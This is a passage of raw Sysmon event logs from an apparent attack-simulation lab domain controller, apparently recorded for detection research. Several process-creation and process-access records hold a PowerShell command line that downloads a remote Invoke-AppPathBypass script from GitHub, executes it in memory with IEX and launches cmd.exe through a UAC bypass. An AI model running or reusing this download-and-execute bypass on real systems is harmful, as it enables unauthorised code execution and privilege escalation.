Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6E3B-603E-FDAA-00000000AD01}13716C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"" 10341000x80000000000000002244195Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.920{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6E3B-603E-FDAA-00000000AD01}13716C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244194Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.920{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E3B-603E-FDAA-00000000AD01}13716C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829F94433) 10341000x80000000000000002244193Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.920{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244192Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.920{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244191Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.920{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244190Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.920{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244189Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.920{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6E3B-603E-FDAA-00000000AD01}13716C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002244188Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.920{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E3B-603E-FDAA-00000000AD01}13716C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f535de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4ac19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4e1471(wow64) 154100x80000000000000002244187Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.922{05ADC7E1-6E3B-603E-FDAA-00000000AD01}13716C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002244186Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.920{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-02 16:56:11.776 11241100x80000000000000002244185Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.905{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-02 16:56:11.773 354300x80000000000000002244184Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:17.899{05ADC7E1-2299-6039-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local60191-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local445microsoft-ds 354300x80000000000000002244183Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:17.899{05ADC7E1-2299-6039-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local60191-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local445microsoft-ds 23542300x80000000000000002244182Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.795{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30506F87A7C9BA10E96EA5DEEFAE9734,SHA256=0A94C9B0F37BE6836FDFB79EDA363EB79D2C050CAC9C272397D1CACE932EBB01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002244181Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.795{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E3F62EE931F54550A59729AB7D01DE9,SHA256=288001492E46C6702B3C43496B2317EB0BB6DDE9A267ED21615201B1B62016EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002244180Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.701{05ADC7E1-6E39-603E-FBAA-00000000AD01}4676ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002244179Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.535{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014868C:\Windows\explorer.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0aa5|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244178Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.535{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014868C:\Windows\explorer.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b09be|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244177Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.535{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014868C:\Windows\explorer.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002244176Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.217{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62714C75C0DAB79100BA1AED709AE9EF,SHA256=45D72EBFD1CEBE8D48BC54FA83B6C4CE005C7EEFB8C314ECE51046C956371B75,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002244175Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.066{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002244174Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.064{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+d18e0|C:\Windows\System32\SHELL32.dll+d180d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+2ea96|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32e2a|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32d46|C:\Windows\System32\SHLWAPI.dll+2a3c2|C:\Windows\System32\SHLWAPI.dll+1d9a4|C:\Windows\System32\COMDLG32.dll+666ad|C:\Windows\System32\COMDLG32.dll+30b1a 10341000x80000000000000002244173Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.064{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+d18e0|C:\Windows\System32\SHELL32.dll+d180d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+2ea96|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32e2a|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32d46|C:\Windows\System32\SHLWAPI.dll+2a3c2|C:\Windows\System32\SHLWAPI.dll+1d9a4|C:\Windows\System32\COMDLG32.dll+666ad|C:\Windows\System32\COMDLG32.dll+30b1a 10341000x80000000000000002244172Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.064{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+d18e0|C:\Windows\System32\SHELL32.dll+d180d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+2ea96|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32e2a|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32d46 10341000x80000000000000002244171Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.064{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+d18e0|C:\Windows\System32\SHELL32.dll+d180d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+2ea96|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32e2a|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32d46|C:\Windows\System32\SHLWAPI.dll+2a3c2 23542300x80000000000000002244249Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.967{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68FBD7B89D5FE643CFD97378C1C98C37,SHA256=21210DD0E98E7B2A26340B636332CF7F0ECB742F971231AAF690C0387B523AAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002244248Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.967{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B92AB8A19028ACCE00D4FEC24E1DDCF5,SHA256=9893B203CE1C038CE0331BFFF92D08BC206C9BF83ED3F92B9D228078B8E9708E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002244247Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 